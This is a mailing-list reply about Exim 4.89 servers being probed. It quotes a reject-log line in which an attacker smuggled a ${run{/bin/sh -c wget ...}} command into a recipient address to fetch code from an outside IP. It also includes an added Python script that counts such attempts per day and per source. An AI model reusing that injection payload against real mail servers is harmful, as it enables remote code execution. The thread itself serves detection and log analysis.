Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
Hi.
On Fri, Jun 21, 2019 at 06:36:20AM +1000, Andrew McGlashan wrote:
> On 21/6/19 5:52 am, Reco wrote:
> > Plain old grep is more than enough here. This one:
> >
> > grep 'run{' /var/log/exim4/reject*
> >
> > finds things like these:
> >
> > 2019-06-19 18:54:43 H=(service.com) [107.182.225.42]
> > F=<support@service.com> rejected RCPT
> > <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.xxx.xxx.xxx\x22}}@localhost>:
> > Unrouteable address
>
> Okay:
> 21 attempts from 8 different IP addresses on one server
>
> 28 attempts on another server
>
> 17 attempts on another server
>
>
> 13 unique IP addresses so far.... (dig -x output)
>
What I'm most interested in here is the time distribution.
I.e. has the number of exploitation attempts lowered after the Exim
banner change? Stayed the same?
Reco
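An added example (not part of Reco's or Andrew's messages) that does what the grep above does and then answers the time-distribution question: it pulls the date and source address from every reject line carrying a `${run{` expansion and counts attempts per day and per source. The sample log lines are constructed (documentation addresses, payload replaced by REDACTED); the log-line layout is assumed from the rejectlog entry quoted above.

```python
import re
from collections import Counter

# Exim reject-log prefix as seen in the quoted entry:
# "YYYY-MM-DD HH:MM:SS H=(helo) [a.b.c.d] ..." (layout assumed from that sample).
LINE_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r".*?\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]"
)
# Same marker the grep in the thread keys on: an Exim ${run{...}} expansion.
RUN_RE = re.compile(r"\$\{run\{")

def parse_run_attempts(lines):
    """Return (date, time, ip) for each reject line containing a ${run{ expansion."""
    records = []
    for line in lines:
        if not RUN_RE.search(line):
            continue
        m = LINE_RE.match(line)
        if m:
            records.append((m.group("date"), m.group("time"), m.group("ip")))
    return records

def attempts_per_day(records):
    """Time distribution: attempts per calendar day, oldest day first."""
    return dict(sorted(Counter(d for d, _, _ in records).items()))

def attempts_per_ip(records):
    """Per-source counts, most active source first."""
    return Counter(ip for _, _, ip in records).most_common()

# Constructed sample rejectlog lines; real input is /var/log/exim4/reject*.
SAMPLE = """\
2019-06-19 18:54:43 H=(service.com) [192.0.2.10] F=<support@service.com> rejected RCPT <root+${run{REDACTED}}@localhost>: Unrouteable address
2019-06-19 19:02:11 H=(mail.example) [198.51.100.7] F=<a@example> rejected RCPT <root+${run{REDACTED}}@localhost>: Unrouteable address
2019-06-19 19:40:05 H=(mx.example) [203.0.113.5] F=<b@example> rejected RCPT <nobody@localhost>: Unrouteable address
2019-06-20 02:13:59 H=(service.com) [192.0.2.10] F=<support@service.com> rejected RCPT <root+${run{REDACTED}}@localhost>: Unrouteable address
2019-06-21 09:30:00 H=(x.example) [198.51.100.7] F=<c@example> rejected RCPT <root+${run{REDACTED}}@localhost>: Unrouteable address
""".splitlines()

if __name__ == "__main__":
    recs = parse_run_attempts(SAMPLE)
    for day, n in attempts_per_day(recs).items():
        print(day, n)
    for ip, n in attempts_per_ip(recs):
        print(ip, n)
```

Comparing the per-day counts before and after the banner change answers Reco's question directly; the third sample line shows that ordinary unrouteable-address rejects are not counted.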